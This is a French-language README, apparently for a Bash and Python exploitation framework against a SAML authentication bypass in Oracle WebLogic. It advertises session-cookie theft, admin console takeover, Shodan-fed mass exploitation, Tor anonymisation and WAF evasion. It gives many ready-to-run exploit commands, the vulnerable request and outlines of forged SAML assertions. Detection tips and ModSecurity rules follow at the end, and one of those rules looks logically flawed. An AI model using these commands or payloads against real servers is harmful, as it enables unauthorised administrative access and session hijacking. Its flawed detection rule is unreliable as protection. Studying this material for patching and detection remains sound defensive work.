
👾 CVE-2026-60206 - Framework d'exploitation du contournement d'authentification SAML Oracle WebLogic ⚡Versions Bash et Python. Fonctionnalités : --detect vérification sûre, --exploit combo/unsigned/xsw/nameid/all, intégration --shodan, prise en charge de --tor, analyse en masse, sortie JSON/CSV/JSONL, validation des cookies. 🛡️ CVSS 9.9 Critique - Utilisation éthique, restez dans la légalité. 🔒

Framework d'exploitation et scanner de masse
Pour tests de sécurité autorisés uniquement.
Cet outil est fourni uniquement à des fins éducatives et de tests d'intrusion autorisés.
Les auteurs et contributeurs ne sont pas responsables de tout usage abusif ou dommage causé par ce logiciel. Les utilisateurs sont seuls responsables de s'assurer qu'ils disposent d'une autorisation écrite explicite du propriétaire de la cible avant tout test. L'accès non autorisé à des systèmes informatiques est illégal en vertu du Computer Fraud and Abuse Act (CFAA) et des lois similaires dans le monde entier.
En utilisant ce logiciel, vous acceptez de :
⚠️ AVERTISSEMENT : Cette vulnérabilité est activement exploitée dans la nature. Toute utilisation non autorisée peut entraîner de graves conséquences juridiques.
CVE-2026-60206 est une vulnérabilité critique de contournement d'authentification non authentifié dans l'implémentation SAML (Security Assertion Markup Language) d'Oracle WebLogic Server. Elle permet à des attaquants distants de contourner l'authentification SAML et d'obtenir un accès administratif à la console WebLogic sans identifiants valides.
Injection SAML : La vulnérabilité provient d'une validation incorrecte des assertions SAML. Les attaquants peuvent concevoir des réponses SAML malveillantes qui contournent les contrôles d'authentification.
Contournement de signature : La vulnérabilité permet de contourner la validation des signatures XML via des attaques XML Signature Wrapping (XSW), où les attaquants enveloppent des assertions malveillantes avec des signatures légitimes.
Manipulation du NameID : Les attaquants peuvent injecter des commentaires ou manipuler le champ NameID pour usurper l'identité d'utilisateurs privilégiés.
Accès administrateur : Une exploitation réussie accorde à l'attaquant un accès administratif à la console WebLogic Server avec un contrôle total.
| Attribute | Value |
|---|---|
| 📅 Découverte | Juillet 2026 (CPU Oracle) |
| ⚠️ Score CVSS | 9.9 (CRITIQUE) |
| 📋 CISA KEV | Ajouté le 21 juillet 2026 |
| 🎯 Produits concernés | Oracle WebLogic Server (Fusion Middleware) |
| 🔄 Versions corrigées | CPU Oracle juillet 2026 |
| 🔓 Authentification | Non requise (Pre-Auth) |
| 🌍 Exploitation active | Confirmée dans la nature (juillet 2026) |
Le multi-exploit éducatif complet enchaîne plusieurs vecteurs d'attaque SAML pour parvenir à un contournement d'authentification, avec des fonctionnalités avancées pour le scan de masse, le vol de cookie et l'accès administratif.
| Feature | Description |
|---|---|
| 🚀 Exploit multi-vecteurs | 7 vecteurs d'attaque : unsigned, xsw_v1-4, nameid, combo |
| 💻 Scan de masse | Scan concurrent avec pool de threads (Python) / FIFO (Bash) |
| 🔐 Vol de cookie | Vole le JSESSIONID pour le détournement de session |
| 👑 Accès à la console d'administration | Accès administratif complet à la console WebLogic |
| 📁 Détection de version | Détecte les versions de WebLogic et le statut de vulnérabilité |
| 🌐 Scan par lots | Exploitation de masse de plusieurs cibles avec threading |
| 🎯 Détection sûre | Option --detect facultative pour la vérification non intrusive de la vulnérabilité |
| 🧩 Intégration Shodan | Chargement des cibles directement depuis une recherche Shodan |
| 🔍 Support Tor | Anonymisez les scans avec le proxy Tor |
| 📊 Formats de sortie multiples | Sortie JSON, CSV, JSONL en streaming |
| 🪟 Multi-plateforme | Prend en charge Linux, macOS, BSD, Alpine, WSL |
| 🔒 Thread-safe | Utilise des mécanismes de verrouillage pour les opérations concurrentes |
| 📋 Enregistrement automatique de session | Sauvegarde les cookies valides pour une utilisation ultérieure |
| ⚙️ Contournement WAF | Rotation du User-Agent et délais aléatoires |
| Vector | Description |
|---|---|
unsigned | Assertion SAML non authentifiée sans signature |
xsw_v1 | XML Signature Wrapping - Assertions multiples |
xsw_v2 | XSW - Contournement de signature enveloppée |
xsw_v3 | XSW - Manipulation d'espace de noms |
xsw_v4 | XSW - Injection d'assertions multiples |
nameid | Injection de commentaires NameID |
combo | Attaque combinée (unsigned + XSW + NameID) |
--detect)Le vérificateur sûr effectue une détection de vulnérabilité non intrusive sans exécuter de charges utiles malveillantes ni apporter de modifications au système.
| Feature | Description |
|---|---|
| 🔍 Détection WebLogic | Identifie les instances WebLogic via LoginForm.jsp |
| 📊 Détection de version | Détecte les versions WebLogic spécifiques et les niveaux de correctifs |
| 🧪 Découverte de points de terminaison SAML | Teste les points de terminaison SAML ACS |
| 🔒 Non intrusif | Identifie uniquement les versions vulnérables |
| 📋 Sortie JSON/CSV | Exporte les résultats pour les rapports |
| 🔄 Scan de masse | Scanne plusieurs cibles avec prise en charge du threading |
curl (pour la version Bash)pip (pour la bibliothèque requests, version Python)# Python version
pip install requests urllib3
# Optional: Shodan support
pip install shodan
# Bash version: curl only (no additional dependencies)
[!NOTE] La version Bash fonctionne avec
curluniquement et ne possède aucune dépendance externe. La version Python nécessiterequestseturllib3(facultatif :shodanpour l'intégration Shodan).
exploit.py)# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin
# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v
# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json
# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv
# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit
# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20
# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl
# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json
# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0
# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify
# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin
# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json
# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20
# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json
# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl
# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify
# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json
# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin
# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt
# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify
# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080
| Oracle WebLogic Version | Status |
|---|---|
| 12.2.1.4.0 | 🔴 VULNÉRABLE |
| 14.1.1.0.0 | 🔴 VULNÉRABLE |
| 14.1.2.0.0 | 🔴 VULNÉRABLE |
| 15.1.1.0.0 | 🔴 VULNÉRABLE |
| Autres versions | Consultez le CPU Oracle de juillet 2026 |
⚠️ Important : Cette vulnérabilité affecte les déploiements WebLogic Server auto-hébergés. Appliquez immédiatement le CPU Oracle de juillet 2026.
La vulnérabilité permet aux attaquants de contourner l'authentification SAML en concevant des réponses SAML malveillantes qui sont incorrectement validées par l'implémentation SAML de WebLogic.
Point de terminaison vulnérable :
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded
SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/
Assertion non signée
saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>
</saml2:Assertion>
Enveloppement de signature XML (XSW)
ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>
<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>
Injection de commentaires NameID
<saml2:NameID Format="...">
</saml2:NameID>
Une exploitation réussie produit un cookie JSESSIONID, accordant un accès administratif à la console WebLogic.
Le cookie volé peut être utilisé pour accéder à :
Recherchez dans vos journaux WebLogic :
access.log – requêtes vers /saml2/sp/acs, /saml2/acs avec des paramètres SAML inhabituelsdomain.log – tentatives de contournement d'authentification avec des assertions SAML invalidesdiagnostic.log – erreurs d'analyse SAML ou échecs de validation de signatureSAMLResponse contenant :
<saml2:Assertion><saml2:NameID>javascript: ou eval() dans les paramètresconfig.xml, jps-config.xml)autodeployweblogic.security modifiés# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10001,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Multiple SAML Assertions',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"
# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10002,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - NameID Comments',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"
# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10003,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Unsigned Assertion',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"